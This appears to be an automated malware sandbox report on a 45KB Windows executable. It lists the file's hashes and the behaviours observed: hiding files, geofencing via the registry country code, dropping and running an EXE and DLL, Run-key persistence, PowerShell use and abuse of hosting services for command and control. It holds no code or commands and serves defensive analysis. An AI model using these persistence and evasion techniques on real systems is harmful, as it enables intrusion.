General

  • Target

    70f758a17090a074e26662dee56282d991ce55a6.exe

  • Size

    45KB

  • Sample

    241113-yxnyys1rfj

  • MD5

    0ffb0e04f66e70f0cd320df2db61999e

  • SHA1

    70f758a17090a074e26662dee56282d991ce55a6

  • SHA256

    9677f7bc0da5cb2654fb6cc9e0ac3c65208c69cc1d4e7aa7707a30133d058621

  • SHA512

    c287b991970602307b7ebba6d95acc5b02e0d753565a5c1b4622bd94161912e891ec2896f964bf7f350f72f6ed5eeaa41f9116e63c9cfeea61d40067ed9f79a1

  • SSDEEP

    768:FeVp2VD9ncfBhrcXnbvOpXBrWB2pRULQe9SOf4hYB6S5GPvr/Sw:FeVYD96GvOpXBrHGse9QhYoqGPz/Sw

Malware Config

Targets

    • Target

      70f758a17090a074e26662dee56282d991ce55a6.exe

    • Size

      45KB

    • MD5

      0ffb0e04f66e70f0cd320df2db61999e

    • SHA1

      70f758a17090a074e26662dee56282d991ce55a6

    • SHA256

      9677f7bc0da5cb2654fb6cc9e0ac3c65208c69cc1d4e7aa7707a30133d058621

    • SHA512

      c287b991970602307b7ebba6d95acc5b02e0d753565a5c1b4622bd94161912e891ec2896f964bf7f350f72f6ed5eeaa41f9116e63c9cfeea61d40067ed9f79a1

    • SSDEEP

      768:FeVp2VD9ncfBhrcXnbvOpXBrWB2pRULQe9SOf4hYB6S5GPvr/Sw:FeVYD96GvOpXBrHGse9QhYoqGPz/Sw

    • Sets file to hidden

      Modifies file attributes to stop it showing in Explorer etc.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Legitimate hosting services abused for malware hosting/C2

MITRE ATT&CK Enterprise v15

Tasks